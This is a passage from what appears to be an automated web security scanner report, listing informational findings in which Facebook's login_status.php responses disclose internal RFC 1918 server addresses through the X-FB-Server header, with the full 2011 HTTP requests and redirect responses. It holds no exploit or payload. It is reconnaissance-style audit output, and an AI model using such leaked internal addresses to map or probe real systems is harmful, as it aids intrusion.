6transport%3Dpostmessage%26frame%3Df2be8e22c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2aefb584%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32d8400c4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b9dcf5ec&relation=parent&transport=postmessage&frame=f2be8e22c4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.209.64
X-Cnection: close
Date: Thu, 05 May 2011 01:25:04 GMT
Content-Length: 0


20.108. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.67.129

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6a7a69b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e30ae81c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8f746478%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12e93fd58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df169fe8258%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f12e93fd58&origin=http%3A%2F%2Faol.sportingnews.com%2Ff314e1fe24&relation=parent&transport=postmessage&frame=f1f0564bbc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.67.129
X-Cnection: close
Date: Thu, 05 May 2011 02:05:32 GMT
Content-Length: 0


20.109. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.244.75

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df225a9f59%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18dea47e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32c53f454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3279fa49c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc935bd5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3279fa49c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1e2c76414&relation=parent&transport=postmessage&frame=f1bc9ec1cc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.244.75
X-Cnection: close
Date: Thu, 05 May 2011 01:43:20 GMT
Content-Length: 0


20.110. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.58.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f42cec0%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f17fd21c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29607e7a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df200ca254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4779f3f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f200ca254&origin=http%3A%2F%2Faol.sportingnews.com%2Ffe8ae498&relation=parent&transport=postmessage&frame=f65533228
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.58.25
X-Cnection: close
Date: Thu, 05 May 2011 01:02:52 GMT
Content-Length: 0


20.111. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.179.34

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8b44b314%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bb639d44%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df280f0b9e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34ec8fee%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13994e6b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f34ec8fee&origin=http%3A%2F%2Faol.sportingnews.com%2Ff25f0925fc&relation=parent&transport=postmessage&frame=f285e52b6c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.179.34
X-Cnection: close
Date: Thu, 05 May 2011 01:33:22 GMT
Content-Length: 0


20.112. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.49.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5cbd96d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d3f3fb98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d7dc0e7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15b2385ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28b205e3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15b2385ac&origin=http%3A%2F%2Faol.sportingnews.com%2Fffad56b1&relation=parent&transport=postmessage&frame=f3ab638c38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.49.41
X-Cnection: close
Date: Thu, 05 May 2011 01:01:15 GMT
Content-Length: 0


20.113. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.97.127

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a6af95a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a491d6c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d1167094%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffebe250c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d1e30bb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ffebe250c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b2fe2628&relation=parent&transport=postmessage&frame=f38745953
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.97.127
X-Cnection: close
Date: Thu, 05 May 2011 02:09:33 GMT
Content-Length: 0


20.114. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.180.31

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d5f04ce8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f8b902e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ca50d918%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31ca45bc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df92377b5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f31ca45bc8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff24f745ae8&relation=parent&transport=postmessage&frame=f201cd97c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.31
X-Cnection: close
Date: Thu, 05 May 2011 01:54:16 GMT
Content-Length: 0


20.115. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.115.71

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4874ef4c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9e05244%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f62df18%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcb3bcf2c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f5433e6%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fcb3bcf2c&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff3196709bc&relation=parent&transport=postmessage&frame=f3ada2e1a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.71
X-Cnection: close
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 0


20.116. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.80.35

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbf0092d%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f32c7344%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15fd82568%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3490a87c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23ac3ba2c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
